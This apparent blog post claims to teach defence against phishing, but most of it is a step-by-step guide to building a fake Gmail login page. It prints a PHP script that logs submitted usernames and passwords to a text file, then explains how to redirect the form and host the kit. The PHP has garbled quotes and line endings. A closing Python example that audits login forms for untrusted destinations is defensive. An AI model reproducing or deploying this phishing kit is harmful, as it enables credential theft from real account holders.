

Friends, I have already introduced phishing and how it works; now I am going to provide details of how hackers use phishing to hack your Gmail account.
Below I will show a simple example of some of the steps a hacker might take to create a phishing website.
Seeing the steps a hacker would take will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail, because they are the most common and, once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
2. After choosing his target, the hacker will create a perfect replica of the target site's login page.
3. Once you have created it, rename untitled.html to index.html. The reason you want to name it “index” is so that when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of stealing your information.
Below is a simple PHP script that logs and stores your login details when you click “Sign in”.
To see how it works, copy and paste the following code into Notepad. Next, save it into the same directory as the Gmail page, and name it log.php. In addition to the log.php page, create a new empty text file and name it log.txt.
****************************************************************************
<?php
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=
false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=
1k96igf4806cy&ltmpl=default&ltmplcache=2 “);
$handle = fopen(“log.txt”, “a”);
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
Fwrite($handle, “rn”);
fclose($handle);
exit;
?>
*******************************************************************************
5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.html with Notepad.
6. He redirects the sign-in process to log.php.
This will make the form submit to your PHP phish script instead of to Google.
7. Save and close the file.
8. Next the hacker would upload the files to a free web host that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
9. Once all the files are uploaded, you must give write permissions to the “log.txt” file.
10. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
11. Now go take a look at your log.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/log.txt. Although this is the most common, the web host you use may provide a different looking URL.
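
From the defender's side, step 6 is the part that can be checked mechanically: the replica's sign-in form no longer submits to Google. The Python sketch below is an added example, not part of the original post; it flags any password form whose action resolves to a host outside an allow-list. The allow-list, the sample URLs and both sample forms are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: hosts allowed to receive these credentials (illustrative allow-list).
TRUSTED_HOSTS = {"accounts.google.com", "www.google.com"}

class LoginFormAuditor(HTMLParser):
    """Collects the action attribute of every <form> that holds a password field."""
    def __init__(self):
        super().__init__()
        self._action = None          # None means "not inside a form"
        self._has_password = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._action = attrs.get("action") or ""
            self._has_password = False
        elif (tag == "input" and self._action is not None
              and (attrs.get("type") or "").lower() == "password"):
            self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            if self._has_password:
                self.password_form_actions.append(self._action)
            self._action = None

def audit_login_page(page_url, html):
    """Return (resolved_action_url, reason) for each suspicious password form."""
    parser = LoginFormAuditor()
    parser.feed(html)
    findings = []
    for action in parser.password_form_actions:
        # A relative or empty action resolves against the page's own URL.
        target = urlparse(urljoin(page_url, action))
        if target.scheme != "https":
            findings.append((target.geturl(), "credentials not sent over HTTPS"))
        elif target.hostname not in TRUSTED_HOSTS:
            findings.append((target.geturl(), "credentials sent to untrusted host"))
    return findings

# Constructed sample forms: a legitimate-looking one and a replica posting to log.php.
REAL_FORM = ('<form action="https://accounts.google.com/signin" method="post">'
             '<input name="Email"><input type="password" name="Passwd"></form>')
REPLICA_FORM = ('<form action="log.php" method="get">'
                '<input name="Email"><input type="password" name="Passwd"></form>')

if __name__ == "__main__":
    print(audit_login_page("https://replica.example/index.html", REPLICA_FORM))
```

The same check is what a user does by eye when reading the address bar before typing a password: the host that receives the credentials must be the one you expect.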
